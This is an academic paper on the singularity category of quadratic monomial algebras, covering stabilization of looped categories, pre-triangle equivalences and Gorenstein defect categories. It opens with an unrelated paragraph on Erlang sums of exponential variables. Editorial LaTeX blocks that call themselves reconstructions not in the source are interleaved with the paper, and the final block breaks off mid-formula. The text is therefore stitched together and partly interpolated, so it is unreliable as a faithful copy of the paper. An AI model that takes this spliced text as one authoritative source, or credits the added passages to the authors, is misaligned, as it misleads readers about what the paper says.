The probability density function of a sum of independent random variables is the convolution of their individual densities, and the convolution operation is commutative. In particular, the sum of n independent exponential random variables with a common parameter λ follows an Erlang(n, λ) distribution, which can be interpreted as the waiting time for the nth event of the Poisson process; its expectation is the sum of the individual means, n/λ. The Erlang distribution is the Gamma distribution with integer shape parameter (in a general Gamma distribution, n may be a non-integer). For independent exponential random variables with pairwise distinct parameters, rewriting the convolution over a common denominator expresses the density of the sum as a weighted combination of the individual exponential densities (the hypoexponential distribution).
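The closed form behind this discussion is the Erlang density. The following LaTeX sketch states the textbook result for n independent Exp(λ) variables; it is supplied here for completeness rather than recovered from the source text:

```latex
% Sum of n i.i.d. exponential variables X_1, ..., X_n ~ Exp(lambda).
% S_n = X_1 + ... + X_n follows the Erlang(n, lambda) distribution:
\[
  f_{S_n}(x) \;=\; \frac{\lambda^n x^{\,n-1} e^{-\lambda x}}{(n-1)!},
  \qquad x \ge 0,
\]
% obtained by iterating the convolution with one more exponential factor:
\[
  f_{S_n}(x) \;=\; \int_0^x f_{S_{n-1}}(x-t)\,\lambda e^{-\lambda t}\, dt .
\]
```

Induction on n with the first formula as hypothesis reduces the integral to λ^n e^{−λx} ∫_0^x (x−t)^{n−2}/(n−2)! dt, which evaluates to the stated density.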
The singularity category of a quadratic monomial algebra

Abstract

We exploit singular equivalences between artin algebras that are induced from certain functors between the stable module categories. Such functors are called pre-triangle equivalences. We construct two pre-triangle equivalences connecting the stable module category over a quadratic monomial algebra to the one over an algebra with radical square zero. Consequently, we obtain an explicit singular equivalence between the two algebras. It turns out that this singular equivalence restricts to a triangle equivalence between their stable categories of Gorenstein-projective modules, and thus induces a triangle equivalence between their Gorenstein defect categories.

1. Introduction

Let A be an artin algebra. The singularity category Dsg(A) of A is introduced in [7] under the name ‘the stable derived category’. The terminology is justified by the following fact: the algebra A has finite global dimension if and only if the singularity category Dsg(A) is trivial. Hence, the singularity category provides a homological invariant for algebras of infinite global dimension.

The singularity category captures the stable homological property of an algebra. More precisely, certain information of the syzygy endofunctor on the stable A-module category is encoded in Dsg(A). Indeed, as observed in [21], the singularity category is equivalent to the stabilization of the pair that consists of the stable module category and the syzygy endofunctor on it; see also [4]. This fact is used in [10] to describe the singularity category of an algebra with radical square zero. We mention that related results appear in [19, 26].

By the fundamental result in [7], the stable category of Gorenstein-projective A-modules might be viewed as a triangulated subcategory of Dsg(A). Moreover, if the algebra A is Gorenstein, the two categories are triangle equivalent.
We mention that the study of Gorenstein-projective modules goes back to [2] under the name ‘modules of G-dimension zero’. The Verdier quotient triangulated category Ddef(A) of Dsg(A) by the stable category of Gorenstein-projective A-modules is called the Gorenstein defect category of A in [6]. This terminology is justified by the fact that the algebra A is Gorenstein if and only if the category Ddef(A) is trivial. In other words, the Gorenstein defect category measures how far the algebra is from being Gorenstein. By a singular equivalence between two algebras, we mean a triangle equivalence between their singularity categories. We observe that a derived equivalence implies a singular equivalence. However, the converse is not true; for such examples, see [9, 23]. In general, a singular equivalence does not induce a triangle equivalence between Gorenstein defect categories. We mention the work [30], where a class of nice singular equivalences are studied. The aim of this paper is to study the singularity category of a quadratic monomial algebra. The main ingredient is the following observation: for two algebras, a certain functor between their stable module categories induces a singular equivalence after the stabilization. We call such a functor a pre-triangle equivalence between the stable module categories. More generally, the two stable module categories are called pre-triangle quasi-equivalent provided that there is a zigzag of pre-triangle equivalences connecting them. In this case, we also have a singular equivalence. The main result Theorem 4.5 claims a pre-triangle quasi-equivalence between the stable module category of a quadratic monomial algebra and the one of an algebra with radical square zero. Combining this with the results in [10, 13, 27], we describe the singularity category of a quadratic monomial algebra via the category of finitely generated graded projective modules over the Leavitt path algebra of a certain quiver; see Proposition 5.3. 
We mention that this description extends the result in [20] on the singularity category of a gentle algebra; see also [8, 12].

The paper is organized as follows. In Section 2, we recall the stabilization of a looped category. We introduce the notion of a pre-stable equivalence between looped categories, which is a functor between looped categories that induces an equivalence after the stabilization. A pre-stable equivalence in the left triangulated case is called a pre-triangle equivalence, which induces a triangle equivalence after the stabilization. In Section 3, we recall the result in [21] which states that the singularity category of an algebra is triangle equivalent to the stabilization of the stable module category. Therefore, a pre-triangle equivalence between stable module categories induces a singular equivalence; see Proposition 3.2 and compare Proposition 3.6. We include explicit examples of pre-triangle equivalences between stable module categories. In Section 4, we associate an algebra B with radical square zero to a quadratic monomial algebra A; compare [12]. We construct explicitly two pre-triangle equivalences connecting the stable A-module category to the stable B-module category. Then we obtain the required singular equivalence between A and B; see Theorem 4.5. In Section 5, we combine Theorem 4.5 with the results in [10, 13, 27] on the singularity category of an algebra with radical square zero. We describe the singularity category and the Gorenstein defect category of a quadratic monomial algebra via the categories of finitely generated graded projective modules over Leavitt path algebras of certain quivers; see Proposition 5.3. We discuss some concrete examples at the end.

2. The stabilization of a looped category

In this section, we recall the construction of the stabilization of a looped category. The basic references are [16, Chapter I], [28, Section 1], [21] and [4, Section 3].
Following [4], a looped category (C,Ω) consists of a category C with an endofunctor Ω:C→C, called the loop functor. The looped category (C,Ω) is said to be stable if the loop functor Ω is an auto-equivalence on C, while it is strictly stable if Ω is an automorphism. By a looped functor (F,δ) between two looped categories (C,Ω) and (D,Δ), we mean a functor F:C→D together with a natural isomorphism δ:FΩ→ΔF. For a looped functor (F,δ), we define inductively for each i≥1 a natural isomorphism δi:FΩi→ΔiF such that δ1=δ and δi+1=Δiδ◦δiΩ. Set δ0 to be the identity transformation on F, where Ω0 and Δ0 are defined to be the identity functors. We say that a looped functor (F,δ):(C,Ω)→(D,Δ) is strictly looped provided that FΩ=ΔF as functors and δ is the identity transformation on FΩ. In this case, we write (F,δ) as F; compare [16, 1.1]. Let (C,Ω) be a looped category. We define a category S=S(C,Ω) as follows. The objects of S are pairs (X,n) with X an object in C and n∈Z. The Hom-set is defined by the following formula: HomS((X,n),(Y,m))=colimHomC(Ωi−n(X),Ωi−m(Y)), (2.1) where i runs over all integers satisfying i≥n and i≥m. An element f in HomS((X,n),(Y,m)) is said to have an ith representative fi:Ωi−n(X)→Ωi−m(Y) provided that the canonical image of fi equals f. The composition of morphisms in S is induced by the one in C. We observe that Ω˜:S→S sending (X,n) to (X,n−1) is an automorphism. Then we have a strictly stable category (S,Ω˜). There is a canonical functor S:C→S sending X to (X,0), and a morphism f to S(f) whose 0th representative is f. For an object X in C, we have a natural isomorphism θX:(ΩX,0)⟶(X,−1), whose 0th representative is IdΩX. Indeed, this yields a looped functor (S,θ):(C,Ω)⟶(S,Ω˜). This process is called in [16] the stabilization of the looped functor (C,Ω). We mention that S:C→S is an equivalence if and only if (C,Ω) is a stable category, in which case we identify (C,Ω) with (S,Ω˜). 
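The colimit in formula (2.1) is a filtered colimit taken along maps induced by the loop functor. Spelled out (a routine expansion of the definition, not written explicitly above), the transition maps of the directed system are:

```latex
% Transition maps of the directed system defining Hom_S((X,n),(Y,m)):
% for each i >= max(n,m), apply the loop functor once.
\[
  \operatorname{Hom}_{\mathcal{C}}\bigl(\Omega^{\,i-n}(X),\,\Omega^{\,i-m}(Y)\bigr)
  \;\xrightarrow{\;\Omega\;}\;
  \operatorname{Hom}_{\mathcal{C}}\bigl(\Omega^{\,i+1-n}(X),\,\Omega^{\,i+1-m}(Y)\bigr),
  \qquad f \longmapsto \Omega(f).
\]
% Consequently, two representatives f_i and g_j define the same morphism
% in S precisely when Omega^{k-i}(f_i) = Omega^{k-j}(g_j) for some large k.
```

This makes the notion of an "ith representative" concrete: a morphism of S is an equivalence class of morphisms in C that become equal after applying Ω sufficiently many times.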
The stabilization functor (S,θ) enjoys a universal property; see [16, Proposition 1.1]. Let (F,δ):(C,Ω)→(D,Δ) be a looped functor with (D,Δ) a strictly stable category. We denote by Δ−1 the inverse of Δ. Then there is a unique functor F˜:(S,Ω˜)→(D,Δ) which is strictly looped satisfying F=F˜S and δ=F˜θ. The functor F˜ sends (X,n) to Δ−nF(X). For a morphism f:(X,n)→(Y,m) whose ith representative is given by fi:Ωi−n(X)→Ωi−m(Y), we have

F˜(f)=Δ−i((δYi−m)◦F(fi)◦(δXi−n)−1):Δ−nF(X)⟶Δ−mF(Y). (2.2)

Lemma 2.1 Keep the notation as above. Then the functor F˜:(S,Ω˜)→(D,Δ) is an equivalence if and only if the following conditions are satisfied:

(1) for any morphism g:F(X)→F(Y) in D, there exist i≥0 and a morphism f:Ωi(X)→Ωi(Y) in C satisfying Δi(g)=δYi◦F(f)◦(δXi)−1;

(2) for any two morphisms f,f′:X→Y in C with F(f)=F(f′), there exists i≥0 such that Ωi(f)=Ωi(f′);

(3) for any object Z in D, there exist i≥0 and an object X in C satisfying Δi(Z)≃F(X).

Proof Indeed, the above three conditions are equivalent to the statements that F˜ is full, faithful and dense, respectively. We refer to [28, 1.2 Proposition] for the details and compare [4, Proposition 3.4].□

We now apply Lemma 2.1 to a specific situation. Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. Consider the composition

(C,Ω)⟶(F,δ)(C′,Ω′)⟶(S,θ)(S(C′,Ω′),Ω˜′). (2.3)

By the universal property of the stabilization, there is a unique strictly looped functor S(F,δ):(S(C,Ω),Ω˜)→(S(C′,Ω′),Ω˜′) making the corresponding diagram commutative. We call the functor S(F,δ) the stabilization of (F,δ).

Proposition 2.2 Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. Then its stabilization S(F,δ) is an equivalence if and only if the following conditions are satisfied:

(S1) for any morphism g:F(X)→F(Y) in C′, there exist i≥0 and a morphism f:Ωi(X)→Ωi(Y) in C satisfying Ω′i(g)=δYi◦F(f)◦(δXi)−1;

(S2) for any two morphisms f,f′:X→Y in C with F(f)=F(f′), there exists i≥0 such that Ωi(f)=Ωi(f′);

(S3) for any object C′ in C′, there exist i≥0 and an object X in C satisfying Ω′i(C′)≃F(X).
The looped functor (F,δ) is called a pre-stable equivalence if it satisfies (S1)–(S3). The result implies that a pre-stable equivalence induces an equivalence between the stabilized categories. Proof Write (D,Δ)=(S(C′,Ω′),Ω˜′) and F˜=S(F,δ). Write the composition (2.3) as (SF,∂). Then for an object X in C, the morphism ∂X:SFΩ(X)→Ω˜′SF(X) equals θFX◦S(δX). We make the following observation: for a morphism f:Ωl(X)→Ωl(Y) in C, the morphism ∂Yl◦SF(f)◦(∂Xl)−1 has a 0th representative δYl◦F(f)◦(δXl)−1. We claim that for each 1≤i≤3, the condition ( Si) for (F,δ) is equivalent to the condition ( i) in Lemma 2.1 for (SF,∂). Then we are done by Lemma 2.1. In what follows, we only prove that ( Si) implies ( i). By reversing the argument, we obtain the converse implication. Assume that (S1) for (F,δ) holds. We take a morphism g:SF(X)=(FX,0)→SF(Y)=(FY,0) in D. We assume that g has a jth representative gj:Ω′jF(X)→Ω′jF(Y). Consider the morphism h:F(ΩjX)→F(ΩjY) by h=(δYj)−1◦gj◦δXj. Then by (S 1), there exist i≥0 and a morphism f:Ωi+j(X)→Ωi+j(Y) satisfying Ω′i(h)=(δΩjYi)◦F(f)◦(δΩjXi)−1. Then we have Δi+j(g)=∂Yi+j◦SF(f)◦(∂Xi+j)−1. Here, we use the observation above and the fact that Δi+j(g) has a 0th representative Ω′i(gj). The we have (1) for (SF,∂). Assume that (S2) for (F,δ) holds. We take two morphisms f,f′:X→Y in C with SF(f)=SF(f′). Then there exists j≥0 such that Ω′jF(f)=Ω′jF(f′). Using the natural isomorphism δj, we infer that FΩj(f)=FΩj(f′). By (S2), there exists i≥0 such that Ωi+j(f)=Ωi+j(f′), proving (2) for (SF,∂). Assume that (S3) for (F,δ) holds. We take any object (C′,n) in (D,Δ). We may assume that n≥0. Otherwise, we use the isomorphism θC′−n:((Ω′)−n(C′),0)≃(C′,n). By (S3), there exist j≥0 and an object X in C satisfying Ω′j(C′)≃F(X). We observe that Δj+n(C′,n)=(C′,−j), which is isomorphic to SΩ′j(C′), which is further isomorphic to SF(X). Set i=j+n. Then we have the required isomorphism Δi(C′,n)≃SF(X) in (3) for (SF,∂). 
This completes the proof of the claim.□ We make an easy observation. Corollary 2.3 Let (F,δ):(C,Ω)→(C′,Ω′)be a looped functor. Assume that Fis fully faithful. Then (F,δ)is a pre-stable equivalence if and only if (S3) holds. Proof By the fully-faithfulness of F, the conditions (S1) and (S2) hold trivially. We just take i=0 in both the conditions.□ We say that two looped categories (C,Ω) and (C′,Ω′) are pre-stably quasi-equivalent provided that there exists a chain of looped categories (C,Ω)=(C1,Ω1),(C2,Ω2),…,(Cn,Ωn)=(C′,Ω′) (2.4) such that for each 1≤i≤n−1, there exists a pre-stable equivalence from (Ci,Ωi) to (Ci+1,Ωi+1), or a pre-stable equivalence from (Ci+1,Ωi+1) to (Ci,Ωi). We have the following immediate consequence of Proposition 2.2. Corollary 2.4 Let (C,Ω)and (C′,Ω′)be two looped categories which are pre-stably quasi-equivalent. Then there is a looped functor (S(C,Ω),Ω˜)⟶∼(S(C′,Ω′),Ω˜′),which is an equivalence.□ Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. A full subcategory X⊆C is said to be saturated provided that the following conditions are satisfied: (Sa1) For each object X in C, there is a morphism ηX:X→G(X) with G(X) in X such that F(ηX) is an isomorphism and that Ωd(ηX) is an isomorphism for some d≥0. (Sa2) For a morphism f:X→Y, there is a morphism G(f):G(X)→G(Y) with G(f)◦ηX=ηY◦f. (Sa3) The conditions (S1)–(S3) above hold by requiring that all the objects X,Y belong to X. Example 2.5 Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. Assume that F has a right adjoint functor G, which is fully faithful. Assume further that the unit η:IdC→GF satisfies the following condition: for each object X, there exists d≥0 with Ωd(ηX) an isomorphism. Take X to be the essential image of G. We claim that X⊆C is a saturated subcategory. Indeed, the restriction F∣X:X→C′ is an equivalence. Then (Sa3) holds trivially, by taking i to be zero in (S1)–(S3). The conditions (Sa1) and (Sa2) are immediate from the assumption. 
Here, we use the well-known fact that F(η) is a natural isomorphism, since G is fully faithful. Lemma 2.6 Let (F,δ):(C,Ω)→(C′,Ω′)be a looped functor, and X⊆Ca saturated subcategory. Then the conditions (S1)–(S3) hold, that is, the functor (F,δ)is a pre-stable equivalence. Proof It suffices to verify (S1) and (S2). For (S1), take any morphism g:F(X)→F(Y) in C′. Consider g′=F(ηY)◦g◦F(ηX)−1:FG(X)→FG(Y). Then by (Sa3), there exist i≥0 and f′:Ωi(GX)→Ωi(GY) with Ω′i(g′)=δGYi◦F(f′)◦(δGXi)−1. We may assume that i is large enough such that both Ωi(ηX) and Ωi(ηY) are isomorphisms. Take f=(Ωi(ηY))−1◦f′◦Ωi(ηX), which is the required morphism in (S1). Let f,f′:X→Y be morphisms with F(f)=F(f′). Applying (Sa2) and using the isomorphisms F(ηX) and F(ηY), we have FG(f)=FG(f′). By (Sa3), we have ΩiG(f)=ΩiG(f′) for some i≥0. We assume that i is large enough such that both Ωi(ηX) and Ωi(ηY) are isomorphisms. Then we infer from (Sa2) that Ωi(f)=Ωi(f′). We are done with (S2).□ We will specialize the consideration to left triangulated categories. A looped category (C,Ω) is additive provided that C is an additive category and the loop functor Ω is an additive functor. We recall that a left triangulated category (C,Ω,E) consists of an additive looped category (C,Ω) and a class E of left triangles in C satisfying certain axioms, which are analogous to those for a triangulated category, but the endofunctor Ω is possibly not an auto-equivalence. The following convention is usual. We call a left triangulated category (C,Ω,E) a triangulated category, provided that the category (C,Ω) is stable, that is, the endofunctor Ω is an auto-equivalence. In this case, the translation functor Σ of C is a quasi-inverse of Ω. Then this notion is equivalent to the original one of a triangulated category in the sense of Verdier. For details, we refer to [5] and compare [21]. In what follows, we write C for the left triangulated category (C,Ω,E). 
A looped functor (F,δ) between two left triangulated categories C and C′=(C′,Ω′,E′) is called a triangle functor if F is an additive functor and sends left triangles to left triangles. We sometimes suppress the natural isomorphism δ and simply denote the triangle functor by F. A triangle functor which is a pre-stable equivalence is called a pre-triangle equivalence. Two left triangulated categories C and C′ are pre-triangle quasi-equivalent if they are pre-stably quasi-equivalent such that all the categories in (2.4) are left triangulated and all the pre-stable equivalences connecting them are pre-triangle equivalences.

For a left triangulated category C=(C,Ω,E), the stabilized category S(C)≔(S(C,Ω),Ω˜,E˜) is a triangulated category, where the translation functor Σ=(Ω˜)−1 and the triangles in E˜ are induced by the left triangles in E; see [4, Section 3].

Corollary 2.7 Let C and C′ be two left triangulated categories which are pre-triangle quasi-equivalent. Then there is a triangle equivalence S(C)→∼S(C′).□

3. The singularity categories and singular equivalences

In this section, we recall the notion of the singularity category of an algebra. We shall show that for two algebras whose stable module categories are pre-triangle quasi-equivalent, their singularity categories are triangle equivalent; see Proposition 3.2 and compare Proposition 3.6 below.

Let k be a commutative artinian ring with a unit. We emphasize that all the functors and categories are required to be k-linear in this section. Let A be an artin k-algebra. We denote by A-mod the category of finitely generated left A-modules, and by A-proj the full subcategory consisting of projective modules. We denote by A-mod̲ the stable category of A-mod modulo projective modules [3, p. 104]. The morphism space Hom̲A(M,N) of two modules M and N in A-mod̲ is defined to be HomA(M,N)/p(M,N), where p(M,N) denotes the k-submodule formed by morphisms that factor through projective modules.
For a morphism f:M→N, we write f¯ for its image in Hom̲A(M,N). Recall that for an A-module M, its syzygy ΩA(M) is the kernel of its projective cover P(M)→pMM. We fix for M a short exact sequence 0→ΩA(M)→iMP(M)→pMM→0. This gives rise to the syzygy functor ΩA:A-mod̲→A-mod̲; see [3, p. 124]. Indeed, A-mod̲≔(A-mod̲,ΩA,EA) is a left triangulated category, where EA consists of left triangles that are induced from short exact sequences in A-mod. More precisely, given a short exact sequence 0→X→fY→gZ→0, we have the following commutative diagram: Then ΩA(Z)→h¯X→f¯Y→g¯Z is a left triangle in EA. As recalled in Section 2, the stabilized category S(A-mod̲) is a triangulated category. There is a more well-known description of this stabilized category as the singularity category; see [21]. To recall this, we denote by Db(A-mod) the bounded derived category of A-mod. We identify an A-module M with the corresponding stalk complex concentrated at degree zero, which is also denoted by M. Recall that a complex in Db(A-mod) is perfect provided that it is isomorphic to a bounded complex consisting of projective modules. The full subcategory consisting of perfect complexes is denoted by perf(A), which is a triangulated subcategory of Db(A-mod) and is closed under direct summands; see [7, Lemma 1.2.1]. Following [22], the singularity category of an algebra A is defined to be the Verdier quotient triangulated category Dsg(A)=Db(A-mod)/perf(A); compare [7, 15, 21]. We denote by q:Db(A-mod)→Dsg(A) the quotient functor. We denote a complex of A-modules by X•=(Xn,dn)n∈Z, where Xn are A-modules and the differentials dn:Xn→Xn+1 are homomorphisms of modules satisfying dn+1◦dn=0. The translation functor Σ both on Db(A-mod) and Dsg(A) sends a complex X• to a complex Σ(X•), which is given by Σ(X)n=Xn+1 and dΣXn=−dXn+1. Consider the following functor: FA:A-mod̲⟶Dsg(A) sending a module M to the corresponding stalk complex concentrated at degree zero, and a morphism f¯ to q(f). 
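The commutative diagram referred to above did not survive extraction. In standard notation, reconstructed from the surrounding definitions (the fixed sequence 0→ΩA(Z)→P(Z)→Z→0 and the given short exact sequence), it has the following shape:

```latex
% Lifting a short exact sequence 0 -> X -> Y -> Z -> 0 against the
% projective cover p_Z : P(Z) -> Z; the induced map h on kernels
% yields the left triangle  Omega_A(Z) -> X -> Y -> Z.
\[
\begin{array}{ccccccccc}
0 & \longrightarrow & \Omega_A(Z) & \xrightarrow{\;i_Z\;} & P(Z) & \xrightarrow{\;p_Z\;} & Z & \longrightarrow & 0 \\
  & & \downarrow{\scriptstyle h} & & \downarrow{\scriptstyle t} & & \Vert & & \\
0 & \longrightarrow & X & \xrightarrow{\;f\;} & Y & \xrightarrow{\;g\;} & Z & \longrightarrow & 0
\end{array}
\]
% The lift t exists because P(Z) is projective and g is an epimorphism;
% h is the induced map between the kernels of the two rows.
```

This is the usual construction of left triangles from short exact sequences; the resulting h is well defined in the stable category A-mod̲.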
Here, the well-definedness of FA on morphisms is due to the fact that a projective module is isomorphic to the zero object in Dsg(A). For an A-module M, we consider the two-term complex C(M)=⋯→0→P(M)→pMM→0→⋯ with P(M) at degree zero. Then we have a quasi-isomorphism iM:ΩA(M)→C(M). The canonical inclusion canM:Σ−1(M)→C(M) becomes an isomorphism in Dsg(A). Then we have a natural isomorphism δM=q(canM)−1◦q(iM):FAΩA(M)⟶Σ−1FA(M). In other words, (FA,δ):(A-mod̲,ΩA)→(Dsg(A),Σ−1) is a looped functor. Indeed, FA is an additive functor and sends left triangles to (left) triangles. Then we have a triangle functor (FA,δ):A-mod̲⟶Dsg(A). Applying the universal property of the stabilization to (FA,δ), we obtain a strictly looped functor F˜A:S(A-mod̲)⟶Dsg(A), which is also a triangle functor; see [4, 3.1]. The following basic result is due to [21]. For a detailed proof, we refer to [4, Corollary 3.9]. Lemma 3.1 Keep the notation as above. Then F˜A:S(A-mod̲)→Dsg(A)is a triangle equivalence. By a singular equivalence between two algebras A and B, we mean a triangle equivalence between their singularity categories. Proposition 3.2 Let Aand Bbe two artin algebras. Assume that the stable categories A-mod̲and B-mod̲are pre-triangle quasi-equivalent. Then there is a singular equivalence between Aand B. Proof We just combine Lemma 3.1 and Corollary 2.7.□ In the following two examples, pre-triangle equivalences between stable module categories are explicitly given. We require that k acts centrally on any bimodules. Example 3.3 Let A and B′ be artin algebras, and let MB′A be an A- B′-bimodule. Consider the upper triangular matrix algebra B=(A0MB′). We recall that a left B-module is a column vector (XY), where XA and YB′ are a left A-module and a left B′-module with an A-module homomorphism ϕ:M⊗B′Y→X, respectively; compare [3, III]. We call ϕ the structure morphism of the B-module (XY). Consider the natural full embedding i:A-mod→B-mod, sending an A-module X to i(X)=(X0). 
Since i preserves projective modules and is exact, it commutes with taking the syzygies. Then we have the induced functor i:A-mod̲→B-mod̲, which is a triangle functor. We claim that the induced functor i is a pre-triangle equivalence if and only if the algebra B′ has finite global dimension. In this case, by Proposition 3.2, there is a triangle equivalence Dsg(A)→∼Dsg(B); compare [9, Theorem 4.1(1)]. Indeed, the induced functor i is fully faithful. By Corollary 2.3, we only need to consider the condition (S3). Then we are done by the following fact: for any B-module (XY) and d≥0, we have ΩBd(XY)=(X′ΩB′d(Y)) for some A-module X′. Hence, if ΩB′d(Y)=0, the B-module ΩBd(XY) lies in the essential image of i. The following example is somehow more difficult. Example 3.4 Let A and B′ be artin algebras, and let NAB′ be an A- B′-bimodule. Consider the upper triangular matrix algebra B=(B′0NA). We assume that B′ has finite global dimension. Consider the natural projection functor p:B-mod→A-mod, sending a B-module (XY) to the A-module Y. It is an exact functor which sends projective modules to projective modules. Then we have the induced functor p:B-mod̲→A-mod̲, which is a triangle functor. For an A-module Y, (0Y) is naturally a B-module with the zero structure morphism N⊗AY→0. Take X to be the full subcategory of B-mod̲ consisting of modules of the form (0Y). We claim that X is a saturated subcategory of B-mod̲. Then by Lemma 2.6, the induced functor p is a pre-triangle equivalence. Therefore, by Proposition 3.2, there is a triangle equivalence Dsg(B)→∼Dsg(A); compare [9, Theorem 4.1(2)]. We now prove the claim. For a B-module C=(XY), we consider the projection ηC:(XY)→G(C)=(0Y). Since its kernel has finite projective dimension, it follows that ΩBd(ηC) is an isomorphism for d large enough. We observe that p(ηC) is an isomorphism. Then we have (Sa1). The conditions (Sa2) and (Sa3) are trivial. 
Here for (S2) in X, we use the following fact: if a morphism f:Y→Y′ of A-module factors through a projective A-module P, then the morphism (0f):(0Y)→(0Y′) of B-modules factors though (0P), which has finite projective dimension; consequently, we have ΩBd(0f)=0 for d large enough. Let M be a left A-module. Then M*=HomA(M,A) is a right A-module. Recall that an A-module M is Gorenstein-projective provided that there is an acyclic complex P• of projective A-modules such that the Hom-complex (P•)*=HomA(P•,A) is still acyclic and that M is isomorphic to a certain cocycle Zi(P•) of P•. We denote by A-Gproj the full subcategory of A-mod formed by Gorenstein-projective A-modules. We observe that A-proj⊆A-Gproj. We recall that the full subcategory A-Gproj⊆A-mod is closed under direct summands, kernels of epimorphisms and extensions; compare [2, (3.11)]. In particular, for a Gorenstein-projective A-module M all its syzygies ΩAi(M) are Gorenstein-projective. Since A-Gproj⊆A-mod is closed under extensions, it becomes naturally an exact category in the sense of Quillen [24]. Moreover, it is a Frobenius category, that is, it has enough (relatively) projective and enough (relatively) injective objects, and the class of projective objects coincides with the class of injective objects. In fact, the class of projective-injective objects in A-Gproj equals A-proj. For details, we compare [4, Proposition 2.13]. We denote by A-Gproj̲ the full subcategory of A-mod̲ consisting of Gorenstein-projective A-modules. Then the syzygy functor ΩA restricts to an auto-equivalence ΩA:A-Gproj̲→A-Gproj̲. Moreover, the stable category A-Gproj̲ becomes a triangulated category such that the translation functor is given by a quasi-inverse of ΩA, and that the triangles are induced by short exact sequences in A-Gproj. These are consequences of a general result in [14, Chapter I.2]. The inclusion functor inc:A-Gproj̲→A-mod̲ is a triangle functor between left triangulated categories. 
We consider the composite of triangle functors GA:A-Gproj̲⟶incA-mod̲⟶FADsg(A). Let M,N be Gorenstein-projective A-modules. By the fully-faithfulness of the functor ΩA:A-Gproj̲→A-Gproj̲, the natural map Hom̲A(M,N)⟶HomS(A-mod̲)(M,N) induced by the stabilization functor S:A-mod̲→S(A-mod̲) is an isomorphism. We identify S(A-mod̲) with Dsg(A) by Lemma 3.1. Then this isomorphism implies that the triangle functor GA is fully faithful; compare [7, Theorem 4.1] and [15, Theorem 4.6].

Recall from [7, 15] that an artin algebra A is Gorenstein if the regular module A has finite injective dimension on both sides. Indeed, the two injective dimensions are equal. We mention that a self-injective algebra is Gorenstein, where any module is Gorenstein-projective. The following result is also known. As a consequence, for a self-injective algebra A the stable module category A-mod̲ and Dsg(A) are triangle equivalent; see [21] and [25, Theorem 2.1].

Lemma 3.5 Let A be an artin algebra. Then the following statements are equivalent:

(1) The algebra A is Gorenstein.

(2) The inclusion functor inc:A-Gproj̲→A-mod̲ is a pre-triangle equivalence.

(3) The functor GA:A-Gproj̲→Dsg(A) is a triangle equivalence.

Proof Recall that A is Gorenstein if and only if for any module X, there exists d≥0 with ΩAd(X) Gorenstein-projective; see [18]. The inclusion functor in (2) is fully faithful. By Corollary 2.3, it is a pre-triangle equivalence if and only if the condition (S3) in A-mod̲ is satisfied. Then the equivalence ‘(1)⇔(2)’ follows. Since ΩA:A-Gproj̲→A-Gproj̲ is an auto-equivalence, we identify A-Gproj̲ with its stabilization S(A-Gproj̲). By Lemma 3.1, we identify Dsg(A) with S(A-mod̲). Then the functor GA is identified with the stabilization of the inclusion functor in (2). Then the equivalence ‘(2)⇔(3)’ follows from Proposition 2.2.
□

Recall from [6] that the Gorenstein defect category of an algebra A is defined to be the Verdier quotient triangulated category Ddef(A)=Dsg(A)/ImGA, where ImGA denotes the essential image of the fully-faithful triangle functor GA, and thus is a triangulated subcategory of Dsg(A). By Lemma 3.5(3), the algebra A is Gorenstein if and only if Ddef(A) is trivial; see also [6]. The following observation implies that pre-triangle equivalences seem to be ubiquitous in the study of singular equivalences; compare Proposition 3.2.

Proposition 3.6 Let A and B be artin algebras. Assume that B is a Gorenstein algebra and that there is a singular equivalence between A and B. Then there is a pre-triangle equivalence from A-mod̲ to B-mod̲.

Proof Using the triangle equivalence GB, we obtain a triangle equivalence H:Dsg(A)⟶B-Gproj̲. More precisely, we have H=GB−1L, where L:Dsg(A)→Dsg(B) is the assumed singular equivalence and GB−1 is a quasi-inverse of GB. Then we have the following composite of triangle functors: F:A-mod̲⟶FADsg(A)⟶HB-Gproj̲⟶incB-mod̲. We claim that F is a pre-triangle equivalence. Indeed, the functor FA is a pre-triangle equivalence by Lemma 3.1, where we identify Dsg(A) with its stabilization S(Dsg(A)). The inclusion functor is a pre-triangle equivalence by Lemma 3.5(2). Therefore, all the three functors above are pre-triangle equivalences. Then as their composition, so is the functor F.□

4. The singularity category of a quadratic monomial algebra

In this section, we study the singularity category of a quadratic monomial algebra A. We consider the algebra B with radical square zero that is defined by the relation quiver of A. The main result claims that there is a pre-triangle quasi-equivalence between the stable A-module category and the stable B-module category. Consequently, we obtain an explicit singular equivalence between A and B. For the ease of the reader, we recall some notation on quivers and quadratic monomial algebras.
Let Q=(Q0,Q1;s,t) be a finite quiver, where Q0 is the set of vertices, Q1 the set of arrows, and s,t:Q1→Q0 are maps which assign to each arrow α its starting vertex s(α) and its terminating vertex t(α). A path p of length n in Q is a sequence p=αn⋯α2α1 of arrows such that s(αi)=t(αi−1) for 2≤i≤n; moreover, we define its starting vertex s(p)=s(α1) and its terminating vertex t(p)=t(αn). We observe that a path of length one is just an arrow. To each vertex i, we associate a trivial path ei of length zero, and set s(ei)=i=t(ei). For two paths p and q with s(p)=t(q), we write pq for their concatenation. As convention, we have p=pes(p)=et(p)p. For two paths p and q in Q, we say that q is a sub-path of p provided that p=p″qp′ for some paths p″ and p′. Let k be a field. The path algebra kQ of a finite quiver Q is defined as follows. As a k-vector space, it has a basis given by all the paths in Q. For two paths p and q, their multiplication is given by the concatenation pq if s(p)=t(q), and it is zero, otherwise. The unit of kQ equals ∑i∈Q0ei. Denote by J the two-sided ideal of kQ generated by arrows. Then Jd is spanned by all the paths of length at least d for each d≥2. A two-sided ideal I of kQ is admissible provided that Jd⊆I⊆J2 for some d≥2. In this case, the quotient algebra A=kQ/I is finite-dimensional. We recall that an admissible ideal I of kQ is quadratic monomial provided that it is generated by some paths of length two. In this case, the quotient algebra A=kQ/I is called a quadratic monomial algebra. Observe that the algebra A is with radical square zero if and only if I=J2. We call kQ/J2 the algebra with radical square zero defined by the quiver Q. In what follows, A=kQ/I is a quadratic monomial algebra. We denote by F the set of paths of length two contained in I. Following [29], a path p in Q is non-zero in A provided that it does not belong to I, or equivalently, p does not contain a sub-path in F. In this case, we abuse the image p+I in A with p. 
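As a small illustration of these conventions (an example supplied here for concreteness, not one appearing in the paper), consider the quiver with two vertices and a single arrow:

```latex
% Quiver Q:  1 --alpha--> 2.   Paths: e_1, e_2, alpha.
% The path algebra kQ is 3-dimensional over k, with multiplication
\[
  e_2\,\alpha = \alpha = \alpha\, e_1, \qquad
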